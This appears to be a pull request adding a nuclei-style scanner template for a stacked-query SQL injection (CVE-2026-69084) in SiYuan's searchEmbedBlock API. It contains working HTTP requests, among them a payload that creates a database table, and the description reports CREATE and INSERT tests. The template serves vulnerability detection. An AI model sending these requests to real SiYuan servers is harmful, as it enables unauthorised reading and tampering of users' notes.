### PR TITLE
Add CVE-2026-69084 SiYuan searchEmbedBlock arbitrary SQL execution

### DIFF
--- a/http/cves/2026/CVE-2026-69084.yaml
+++ b/http/cves/2026/CVE-2026-69084.yaml
@@ -1,37 +1,29 @@
 id: CVE-2026-69084
 
 info:
-  name: SiYuan searchEmbedBlock - Arbitrary SQL Execution
+  name: SiYuan - SQL Execution
   author: Boreas37
   severity: critical
   description: |
-    SiYuan versions <= v3.7.2 expose the /api/search/searchEmbedBlock endpoint,
-    which passes a client-supplied SQL statement (stmt) verbatim to the main
-    read-write siyuan.db handle with no single-statement or read-only
-    restriction. Because the underlying SQLite driver executes stacked
-    (semicolon-separated) statements, an attacker can create, insert, update,
-    delete or drop database content. The endpoint is gated only by CheckAuth,
-    making it reachable by the publish RoleReader token and by anonymous users
-    when publish authentication is disabled.
+    SiYuan <= v3.7.2 contains a SQL injection caused by passing client-supplied SQL statements verbatim to the main read-write database handle in /api/search/searchEmbedBlock, letting attackers with publish RoleReader token or anonymous access read and modify content, exploit requires publish RoleReader token or disabled publish authentication.
   impact: |
-    Arbitrary read/write access to the SiYuan SQLite database (blocks, notes,
-    config). Stacked statements allow data tampering and exfiltration.
+    Attackers can read and modify content across all opened cleartext notebooks, potentially compromising data integrity and confidentiality.
   remediation: |
-    Upgrade SiYuan to v3.7.3 or later.
+    Update to version v3.7.3 or later.
   reference:
-    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-p2x7-4c4p-8wh6
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-69084
+    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-vh22-h7hf-www7
     - https://www.vulncheck.com/advisories/siyuan-before-sql-injection-via-searchembedblock
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-69084
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.9
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10
     cve-id: CVE-2026-69084
     cwe-id: CWE-89
   metadata:
     max-request: 2
     verified: true
     shodan-query: 'title:"SiYuan"'
-  tags: cve,cve2026,siyuan,sql,lfi,sqli,unauth
+  tags: cve,cve2026,siyuan,sqli,authenticated
 
 variables:
   auth_code: "{{password}}"
@@ -52,22 +44,19 @@ http:
 
         {"embedBlockID":"20210808180117-6v0mkxr","stmt":"SELECT 1; SELECT 2","excludeIDs":[],"headingMode":0,"breadcrumb":false}
 
-    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: word
-        part: body_2
+        part: body
         words:
           - '"code":0'
 
       - type: word
-        part: body_2
+        part: body
         words:
           - 'SQL statement is not single'
         negative: true
 
-    extractors:
-      - type: kval
-        part: body_2
-        kval:
-          - code
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-69084.yaml
+++ b/http/cves/2026/CVE-2026-69084.yaml
@@ -50,7 +50,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"embedBlockID":"20210808180117-6v0mkxr","stmt":"SELECT 1; CREATE TABLE IF NOT EXISTS pwn_69084 (id INTEGER)","excludeIDs":[],"headingMode":0,"breadcrumb":false}
+        {"embedBlockID":"20210808180117-6v0mkxr","stmt":"SELECT 1; SELECT 2","excludeIDs":[],"headingMode":0,"breadcrumb":false}
 
     cookie-reuse: true
     matchers-condition: and

--- a/http/cves/2026/CVE-2026-69084.yaml
+++ b/http/cves/2026/CVE-2026-69084.yaml
@@ -1,0 +1,73 @@
+id: CVE-2026-69084
+
+info:
+  name: SiYuan searchEmbedBlock - Arbitrary SQL Execution
+  author: Boreas37
+  severity: critical
+  description: |
+    SiYuan versions <= v3.7.2 expose the /api/search/searchEmbedBlock endpoint,
+    which passes a client-supplied SQL statement (stmt) verbatim to the main
+    read-write siyuan.db handle with no single-statement or read-only
+    restriction. Because the underlying SQLite driver executes stacked
+    (semicolon-separated) statements, an attacker can create, insert, update,
+    delete or drop database content. The endpoint is gated only by CheckAuth,
+    making it reachable by the publish RoleReader token and by anonymous users
+    when publish authentication is disabled.
+  impact: |
+    Arbitrary read/write access to the SiYuan SQLite database (blocks, notes,
+    config). Stacked statements allow data tampering and exfiltration.
+  remediation: |
+    Upgrade SiYuan to v3.7.3 or later.
+  reference:
+    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-p2x7-4c4p-8wh6
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-69084
+    - https://www.vulncheck.com/advisories/siyuan-before-sql-injection-via-searchembedblock
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.9
+    cve-id: CVE-2026-69084
+    cwe-id: CWE-89
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: 'title:"SiYuan"'
+  tags: cve,cve2026,siyuan,sql,lfi,sqli,unauth
+
+variables:
+  auth_code: "{{password}}"
+
+http:
+  - raw:
+      - |
+        POST /api/system/loginAuth HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"authCode":"{{auth_code}}"}
+
+      - |
+        POST /api/search/searchEmbedBlock HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"embedBlockID":"20210808180117-6v0mkxr","stmt":"SELECT 1; CREATE TABLE IF NOT EXISTS pwn_69084 (id INTEGER)","excludeIDs":[],"headingMode":0,"breadcrumb":false}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '"code":0'
+
+      - type: word
+        part: body_2
+        words:
+          - 'SQL statement is not single'
+        negative: true
+
+    extractors:
+      - type: kval
+        part: body_2
+        kval:
+          - code


### PR DESCRIPTION
### CVE-2026-69084 — SiYuan searchEmbedBlock Arbitrary SQL Execution (CVSS 9.9)

**Vulnerability:** POST /api/search/searchEmbedBlock passes client-supplied `stmt` verbatim to SQLite (stacked statements allowed). Fixed in v3.7.3 via CheckSingleStatement + CheckReadonlyStatementInBox.

**Verification:**
- ✅ Vulnerable v3.7.2 (Docker): `SELECT 1; CREATE TABLE pwn_test2 (id INT)` → table created in siyuan.db (confirmed via sqlite3)
- ✅ INSERT 31337 confirmed
- ✅ Fixed v3.7.3: `"SQL statement is not single"` / `"not a read-only query"` — blocked
- ✅ nuclei -validate passed

**Notes:** Template uses `{{password}}` var (auth code) — loginAuth + cookie-reuse flow. Works when publish auth disabled (unauth) or with access code.